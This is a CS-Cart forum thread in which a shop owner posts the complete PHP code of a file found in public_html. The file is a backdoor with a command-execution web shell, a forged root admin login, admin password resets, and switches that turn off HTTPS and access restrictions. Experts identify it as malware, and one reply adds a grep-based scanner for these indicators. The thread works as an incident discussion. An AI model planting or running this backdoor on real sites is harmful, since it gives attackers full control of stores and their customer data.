Strange File In Public_Html

 
  • swifty
  • Advanced Member
  • Trial users
  • Join Date: 30-Mar 13
  • 138 posts

Posted 05 November 2014 - 06:58 PM #1

I've recently noticed a file in the public_html folder; its name is /enterle.php and the code in it is as follows. I've changed the password details in case it is sensitive info.

<?php
// Mode "shell": renders a form and runs whatever command is posted to it.
if ($_GET['mode'] == 'shell') {
    echo '
<body bgcolor="black" TEXT="#FFFFFF">
<form action="sph.php?mode=shell" name="shell" method="post">
<input type="text" name="cmd" value="';
    echo $_POST['cmd'];
    echo '" size="50"/>&nbsp;
<input type="submit" value="POST request" />
</form>
<br /><br />
';

    if ($_POST['cmd']) {
        exec($_POST['cmd'], $out);

        foreach ($out as $k => $v) {
            echo "<pre>" . $v . "</pre>";
        }
    }
    echo '
</body>
';
    die();
}

DEFINE('AREA', 'A');
DEFINE('AREA_NAME', 'admin');
define('ACCOUNT_TYPE', 'admin');

require './prepare.php';
require './init.php';

// Mode "login": writes a root admin session without checking any credentials.
if ($_GET['mode'] == 'login' && !isset($_GET['kill'])) {
    $auth = array(
        'user_id' => 1,
        'user_type' => 'A',
        'area' => 'A',
        'login' => 'admin',
        'password_change_timestamp' => time(),
        'first_expire_check' => false,
        'this_login' => time(),
        'is_root' => 'Y'
    );
    $_SESSION['auth'] = $auth;
    $_SESSION['last_status'] = '-------------------';
    fn_redirect(Registry::get('config.admin_index'));
}

// Mode "login" with "kill": same forged session, then the script deletes itself (as sph.php).
if ($_GET['mode'] == 'login' && isset($_GET['kill'])) {
    $auth = array(
        'user_id' => 1,
        'user_type' => 'A',
        'area' => 'A',
        'login' => 'admin',
        'membership_id' => '0',
        'password_change_timestamp' => time(),
        'first_expire_check' => false,
        'this_login' => time(),
        'is_root' => 'Y'
    );
    $_SESSION['auth'] = $auth;
    $_SESSION['last_status'] = '------------------';
    unlink('sph.php');
    if (!is_file('sph.php')) {
        fn_set_notification('N', 'Notice', 'sph.php is removed');
    } else {
        fn_set_notification('E', 'Error', 'sph.php is not removed!');
    }
    fn_redirect(Registry::get('config.admin_index'));
}

// Mode "logout": drops the session again.
if ($_GET['mode'] == 'logout') {
    $auth = array();
    unset($_SESSION['auth']);
    fn_redirect(Registry::get('config.admin_index'));
}

// Mode "change_password": overwrites admin user 1's password with a fixed value
// (the poster replaced the real value with '5894admin').
if ($_GET['mode'] == 'change_password') {
    db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", md5('5894admin'));
    echo "Password Changed to '5894admin'!";
}

// Mode "restore_password": writes the query parameter straight into the password column.
if ($_GET['mode'] == 'restore_password' && !empty($_GET['passwd'])) {
    db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", $_GET['passwd']);
    echo "Password Restored to $_GET[passwd]!";
}

// Mode "restore_password_md5": same, but hashes the parameter first.
if ($_GET['mode'] == 'restore_password_md5' && !empty($_GET['passwd'])) {
    db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", md5($_GET['passwd']));
    echo "Password Restored to $_GET[passwd]!";
}

// Mode "remove_https": switches off secure checkout and secure admin.
if ($_GET['mode'] == 'remove_https') {
    db_query("UPDATE ?:settings SET value='N' WHERE option_name='secure_checkout'");
    db_query("UPDATE ?:settings SET value='N' WHERE option_name='secure_admin'");
    echo "HTTPS disabled!";
}

// Mode "ignore_AR": disables the Access Restrictions add-on.
if ($_GET['mode'] == 'ignore_AR') {
    db_query("UPDATE ?:addons SET status='D' WHERE addon='access_restrictions'");
    echo "Access Restriction is disabled!";
}

// Mode "phpinfo": dumps the server configuration.
if ($_GET['mode'] == 'phpinfo') {
    phpinfo();
}

?>

Should I be worried about this file, and what is its purpose?
Is this a standard CS-Cart file?

 

Posted 05 November 2014 - 07:33 PM #2

Not a standard CS-Cart file.

This looks to be a tool script used to troubleshoot common issues. Have you had anyone assist you with your site? If so, I would contact them.

Jeremy
Requin Creative Group


 
  • tbirnseth
  • CS Cart Expert
  • Authorized Reseller
  • Join Date: 08-Nov 08
  • 11405 posts

Posted 05 November 2014 - 11:58 PM #3

Get rid of it. It is insecure and circumvents all security in the cart. It allows a caller to change your admin password, disable access restrictions and turn off any HTTPS settings you have.

It is malware and you should change all your cPanel and FTP passwords immediately.
Would strongly suggest you also change your primary admin password and force all admin users to change their passwords upon next login.

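As an added example that is not part of this thread or of CS-Cart: a small POSIX shell triage scan that lists PHP files under a web root carrying the indicators tbirnseth describes for the quoted script (command execution driven by request input, a forged admin session written to $_SESSION, direct UPDATEs of the users/settings/addons tables, and phpinfo() dumps). The indicator list is constructed from the quoted script; the web-root path (for example ~/public_html) is assumed to be passed as the first argument, and nothing is modified on disk.

```shell
#!/bin/sh
# Triage scan for PHP files that carry the indicators seen in the script
# quoted in this thread. Added example, not CS-Cart code. Assumes the web
# root path is given as the first argument (e.g. ~/public_html).

# Extended-regex indicator list, constructed from the quoted script.
INDICATORS='exec\(\$_(POST|GET)|\$_(POST|GET)\[.cmd.\]|\$_SESSION\[.auth.\] *=|UPDATE \?:(users|settings|addons) SET|phpinfo\(\)'

# Print "hit-count path" for every PHP file under $1 with at least one hit,
# highest count first. Nothing is modified: review before deleting anything.
scan_webroot() {
    root="$1"
    find "$root" -type f -name '*.php' | while read -r f; do
        # grep -c prints 0 and exits 1 when nothing matches; keep the 0.
        hits=$(grep -E -c "$INDICATORS" "$f" || true)
        if [ "$hits" -gt 0 ]; then
            printf '%s %s\n' "$hits" "$f"
        fi
    done | sort -rn
}

# Show the matching lines of one flagged file, with line numbers, so the
# hit can be judged in context.
show_hits() {
    grep -E -n "$INDICATORS" "$1"
}

if [ -n "${1:-}" ]; then
    scan_webroot "$1"
fi
```

Legitimate CS-Cart files may match one indicator on their own (the login handler, for instance, has to touch the session), so the count and the show_hits context are what separate a stray helper or backdoor like enterle.php from normal code; a file outside the stock distribution with several hits is the one to look at first.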


 
  • Alt-team
  • CS-Cart Developer
  • Authorized Reseller
  • Join Date: 18-Jan 11
  • 2687 posts

Posted 06 November 2014 - 08:38 AM #4

Dear Swifty,

Delete this file without any delay. Change all passwords.

Also it is better to check your website for malware here http://sitecheck.sucuri.net/ or with the help of other services.

Best regards, Alt-team.



 
  • eComLabs
  • CS-Cart Expert
  • Authorized Reseller
  • Join Date: 27-Jan 14
  • 19794 posts

Posted 06 November 2014 - 09:03 AM #5

Similar files are used by developers to log in to the admin panel, make backups and perform other actions. Please contact the developer who worked on your server and ask him if he forgot to delete the file after the work was done.



 
  • swifty
  • Advanced Member
  • Trial users
  • Join Date: 30-Mar 13
  • 138 posts

Posted 20 January 2015 - 10:53 PM #6

Dear Swifty,

Delete this file without any delay. Change all passwords.

Also it is better to check your website for malware here http://sitecheck.sucuri.net/ or with the help of other services.

Best regards, Alt-team.


I've just gone over my past posts and realized the answer given by Alt Team. Can I point out that this code was put in and left in my public_html folder by one of your developers (it's been removed and all passwords changed). I am now concerned as to the level of professionalism, as this code sounds like it should have been removed by the person or persons who put it there in the first place.

I look forward to your reply Alt Team.

 
  • tbirnseth
  • CS Cart Expert
  • Authorized Reseller
  • Join Date: 08-Nov 08
  • 11405 posts

Posted 20 January 2015 - 10:57 PM #7

Actually, it should never be done that way at all.
You should provide ANY developer (or anyone outside your business) with an admin account you can disable and FTP credentials you can also disable or remove after work is completed. No developer should be using a direct script to modify any admin passwords or other manipulation of user credentials.



 
  • swifty
  • Advanced Member
  • Trial users
  • Join Date: 30-Mar 13
  • 138 posts

Posted 20 January 2015 - 11:28 PM #8

As they say, you live and learn, and as I am not a developer I put my trust in Alt Team. They were given both admin passwords and FTP credentials, so alarm bells are ringing as to why the developer felt the need to use this script.

My concerns now are what else is lurking in the background.

 
  • swifty
  • Advanced Member
  • Trial users
  • Join Date: 30-Mar 13
  • 138 posts

Posted 20 January 2015 - 11:30 PM #9

But as I have already said, I will wait and see what Alt Team reply with.

 
  • Alt-team
  • CS-Cart Developer
  • Authorized Reseller
  • Join Date: 18-Jan 11
  • 2687 posts

Posted 21 January 2015 - 12:22 PM #10

Dear Swifty,

We have sent you the PM.

Best regards, Alt-team.
